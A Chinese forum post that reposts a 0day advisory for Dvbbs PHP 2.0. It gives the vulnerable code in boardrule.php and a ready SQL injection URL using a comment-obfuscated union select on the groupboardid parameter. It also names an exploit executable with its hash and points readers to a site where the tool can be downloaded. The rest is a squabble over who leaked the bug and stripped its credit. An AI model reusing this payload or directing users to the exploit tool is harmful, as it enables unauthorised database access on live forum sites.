由Dvbbs PHP 0day引发的争论
昨天刚刚得到 Dvbbs PHP 0day 的资料,看来还是晚了,今天无意间发现了有趣的事情,所以就给大家贴出来。呵呵
漏洞给大家播报下
================================================================
Dvbbs PHP 0day
影响版本:2.0
漏洞文件:/boardrule.php
Author:sniperhg 小蟑螂
信息来源:零客网安 [url]www.0kee.com[/url]
--------------------分割JJ----------------------
相关代码:
function brule() {
    global $dv,$db,$boardid,$lang,$groupboardid;
    $groupboardid=$_GET['groupboardid'];
    if(!empty($_GET['groupboardid'])){
        $rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");  

    }
    else{
        $rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");   
    }
直接获得变量groupboardid,不为空就直接带入查询导致注入。
测试: [url]http://dvbbsroot/boardrule.php?groupboardid=111111111/[/url]**/union/**/select/**/version
()/*
利用工具 dvbbs_php2.0_fucker_.exe  MD5 : 6b931f8e00e90cf4b1faa531a59d4b36

=========================================================================================
(应该是0DAY的发现者说的,还有可能是零客的老大 下称作者)题外话:这个0day作为内部信息我只在10号那天在群共享里发了。
之前sniperhg本打算在清明节时发出来,没想到今天下午无意中在鬼仔的blog里看到了这个。
[url]http://www.huaidan.org/blog/article.asp?id=1767[/url]
文中除了把版权信息去掉了之外跟我在群里发的txt几乎一个字都不带差的。居然说是拣的。
东西发就发了,无所谓,也不是多好的东西。
但是就这件事,我非常不爽。
是谁泄露的,我早晚会查个水落石出。
 
论坛斑竹:
 
跟帖。。。
我X那个人。
鬼仔也不厚道~
 
鬼仔:
。。。。。。
不是我不厚道,我是没想那么多就发出来了。
不好意思。

作者:
 
说实话
一定得查查谁泄露的
和鬼仔没关系
感觉自己内部群里不应该出现会泄露信息的人
我一直很相信自己人的
现在也不例外
 
 
鬼仔:
关于把版权信息去掉的问题,是我确实不知道是你们这里的,我把你们版权信息加上了。
 
内部成员:
 
你还真会捡啊???/
 
鬼仔:
 
我已经道歉了,没必要这样了吧?
 
作者:

没意见
看看蟑螂有何意见和想法
 
游客:
不是内部泄露就是马化腾个J8@!
 
 
小蟑螂:

事都过去了。
但是我希望你能告诉是谁给你的。
OK的话就PM给我。不行就当我没说。
我不希望这个人是我群里的。

 
呵呵,如果能联想到一起,那么就更有趣了,最后总结一句话,什么事情就怕出内奸,
 

关于发布的ODAY工具,网上的大都不能用 大家可以到  [url]http://www.520jsj.com[/url]上去下载,也可以到上面的官方去下载哦。